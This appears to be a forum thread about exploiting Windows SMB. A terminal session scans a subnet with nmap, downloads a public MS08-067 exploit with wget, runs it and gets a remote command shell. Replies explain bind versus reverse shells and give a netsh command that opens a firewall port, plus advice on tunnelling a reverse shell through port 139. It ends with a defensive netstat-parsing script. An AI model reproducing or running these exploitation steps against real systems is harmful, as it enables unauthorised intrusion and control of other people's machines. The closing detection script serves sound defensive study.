b4cktr4ck3 / # svn co --username invitee --password "" svn://svn.insecure.org/nmap-exp/ron
b4cktr4ck3 / # cd ron/nmap-smb
b4cktr4ck3 nmap-smb # ./configure
b4cktr4ck3 nmap-smb # make
b4cktr4ck3 nmap-smb # make install
b4cktr4ck3 ron # nmap -T insane --script smb-check-vulns.nse -p 445 192.168.1.0/24
Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
Interesting ports on firewall.localhost.com (192.168.1.1):
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)
Interesting ports on 192.168.1.127:
PORT STATE SERVICE
445/tcp closed microsoft-ds
Interesting ports on 192.168.1.128:
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:04:4B:18:69:8A (Nvidia)
Interesting ports on 192.168.1.237:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:4A:B6:6D (VMware)
Host script results:
|_ smb-check-vulns: This host is vulnerable to MS08-067
b4cktr4ck3 / # wget http://www.milw0rm.com/exploits/download/7132.py
--13:45:35-- http://www.milw0rm.com/exploits/download/7132.py
=> `7132.py'
Resolving www.milw0rm.com... 76.74.9.18
Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
[ <=> ] 7,085 --.--K/s
13:45:35 (233.53 KB/s) - `7132.py' saved [7085]
b4cktr4ck3 / # python 7132.py 192.168.1.237 2
#######################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#######################################################################
[-]Windows 2003[SP2] payload loaded
[-]Initiating connection
[-]connected to ncacn_np:192.168.1.237[\pipe\browser]
[-]Exploit sent to target successfully...
[1]Telnet to port 4444 on target machine...
b4cktr4ck3 / # telnet 192.168.1.237 4444
Trying 192.168.1.237...
Connected to 192.168.1.237.
Escape character is '^]'.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Are you using bind_tcp?
reverse_tcp should bypass the firewall, but in order to use bind_tcp you have
to execute this command first: netsh firewall set portopening TCP 6112
where 6112 is the port listened on by meterpreter. You could do that with, for
example, the "Windows Execute Command" payload.
You've got this a bit twisted. A bind_tcp payload will open a socket on the victim box and listen for connections to it. The problem with this is that a host based firewall may block incoming connections, so that when your "evil hacker" box attempts to connect to the bind_tcp backdoor, its incoming packet is blocked by the firewall and therefore cannot establish a connection with the listening bind_tcp socket.
A reverse_tcp backdoor does the opposite of a bind_tcp. It does not create a local listening socket; it establishes a reverse connection outbound from the victim to whatever IP and port you specified when you created the payload. This technique takes advantage of the fact that most network based firewalls may not allow traffic into the network, but will usually allow outbound traffic without any problem, especially if your reverse_tcp shell is calling out to a popular port such as port 80 or 443. Also, some host based firewalls will allow these connections even if they are blocking incoming connections (usually because the user got tired of clicking "allow" or "deny" all the time).
For your specific problem, since file and print sharing is turned on, try a reverse_tcp to port TCP/139 of your "evil hacker" box (make sure samba is not running when you do this).
If you want to learn more about reverse_tcp, google for "shoveling a shell". That is the term usually associated with reverse_tcp connections.
-------------------------------
What kind of payload are you using? If it is a simple tcp_backdoor, then on the box you just exploited, open a cmd shell, run netstat -an, and if you see TCP/4444 listening, then the problem is probably firewall related.
If you are using a reverse_tcp_backdoor, then my guess is that the victim is not allowing the backdoor to install/execute. Try a different payload.
Since you provided no info about your network or victim host setup, this is all I can think of.
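The two replies above describe the footprint each payload leaves on the host: a bind_tcp backdoor shows up as an unexpected TCP listener (the TCP/4444 netstat check), while a reverse_tcp backdoor shows up as an outbound connection to a port the network lets through, such as 139. The following added example (not code from the thread) turns that into a small triage script for a defender: it parses constructed Windows `netstat -an` output and reports listeners that are not in an assumed baseline and established outbound connections to watched ports from a host that is not a known file server. The baseline, the watched ports, the server list and the sample output are all assumptions for the example.

```python
import re

# Constructed sample of `netstat -an` output from a Windows 2003 host (not from the thread).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
  TCP    192.168.1.237:139      0.0.0.0:0              LISTENING
  TCP    192.168.1.237:1045     192.168.1.50:139       ESTABLISHED
  TCP    192.168.1.237:1046     192.168.1.1:445        ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""

# Assumed baseline of TCP listeners expected on this host (RPC endpoint mapper, NetBIOS, SMB).
EXPECTED_LISTENERS = {135, 139, 445}
# Remote ports the replies name as reverse-shell choices: a workstation making an
# outbound connection to one of these, to a peer that is not a file server, is worth a look.
WATCHED_REMOTE_PORTS = {139, 4444}
# Assumed list of hosts this machine legitimately talks SMB/NetBIOS to.
KNOWN_FILE_SERVERS = {"192.168.1.1"}

# One netstat row: proto, local addr:port, foreign addr:port, optional state (UDP has none).
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)\s*(\S+)?\s*$")


def parse_netstat(text):
    """Yield (proto, laddr, lport, raddr, rport, state) tuples from netstat -an text."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header, title and blank lines
        proto, laddr, lport, raddr, rport, state = m.groups()
        yield proto, laddr, int(lport), raddr, rport, state or ""


def find_indicators(text, expected=EXPECTED_LISTENERS, watched=WATCHED_REMOTE_PORTS,
                    servers=KNOWN_FILE_SERVERS):
    """Return (kind, detail) findings: unexpected listeners and odd outbound connections."""
    findings = []
    for proto, laddr, lport, raddr, rport, state in parse_netstat(text):
        if proto != "TCP":
            continue
        if state == "LISTENING" and lport not in expected:
            findings.append(("unexpected_listener", f"{laddr}:{lport}"))
        elif (state == "ESTABLISHED" and rport.isdigit()
              and int(rport) in watched and raddr not in servers):
            findings.append(("outbound_to_watched_port", f"{laddr}:{lport} -> {raddr}:{rport}"))
    return findings
```

On the sample this flags the 0.0.0.0:4444 listener and the outbound connection to 192.168.1.50:139, while the legitimate SMB session to the file server is left alone.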
------------------------------